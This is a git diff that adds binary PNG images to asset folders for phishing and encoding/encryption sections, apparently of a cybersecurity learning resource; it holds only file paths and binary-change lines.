diff --git a/assets/images/cyber_security_landscape/3_phishing/image-10.png b/assets/images/cyber_security_landscape/3_phishing/image-10.png new file mode 100644 index 0000000..752b0bb Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-10.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-11.png b/assets/images/cyber_security_landscape/3_phishing/image-11.png new file mode 100644 index 0000000..78f1bc6 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-11.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-12.png b/assets/images/cyber_security_landscape/3_phishing/image-12.png new file mode 100644 index 0000000..5ef0878 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-12.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-13.png b/assets/images/cyber_security_landscape/3_phishing/image-13.png new file mode 100644 index 0000000..7f517cc Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-13.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-14.png b/assets/images/cyber_security_landscape/3_phishing/image-14.png new file mode 100644 index 0000000..5ce6259 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-14.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-15.png b/assets/images/cyber_security_landscape/3_phishing/image-15.png new file mode 100644 index 0000000..e573c17 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-15.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-2.png b/assets/images/cyber_security_landscape/3_phishing/image-2.png new file mode 100644 index 0000000..500e91c Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-2.png differ 
diff --git a/assets/images/cyber_security_landscape/3_phishing/image-3.png b/assets/images/cyber_security_landscape/3_phishing/image-3.png new file mode 100644 index 0000000..fc2ddc6 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-3.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-4.png b/assets/images/cyber_security_landscape/3_phishing/image-4.png new file mode 100644 index 0000000..5b7a657 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-4.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-5.png b/assets/images/cyber_security_landscape/3_phishing/image-5.png new file mode 100644 index 0000000..81ab092 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-5.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-6.png b/assets/images/cyber_security_landscape/3_phishing/image-6.png new file mode 100644 index 0000000..262943c Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-6.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-7.png b/assets/images/cyber_security_landscape/3_phishing/image-7.png new file mode 100644 index 0000000..4e20f8d Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-7.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-8.png b/assets/images/cyber_security_landscape/3_phishing/image-8.png new file mode 100644 index 0000000..8fc3703 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-8.png differ diff --git a/assets/images/cyber_security_landscape/3_phishing/image-9.png b/assets/images/cyber_security_landscape/3_phishing/image-9.png new file mode 100644 index 0000000..e5aeeb9 Binary files /dev/null and b/assets/images/cyber_security_landscape/3_phishing/image-9.png differ 
diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png new file mode 100644 index 0000000..cd6e095 Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-2.png differ diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png new file mode 100644 index 0000000..e8c9fa0 Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-3.png differ diff --git a/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png b/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png new file mode 100644 index 0000000..2556d6b Binary files /dev/null and b/assets/images/cyber_security_landscape/4_encoding_encryption/image-4.png differ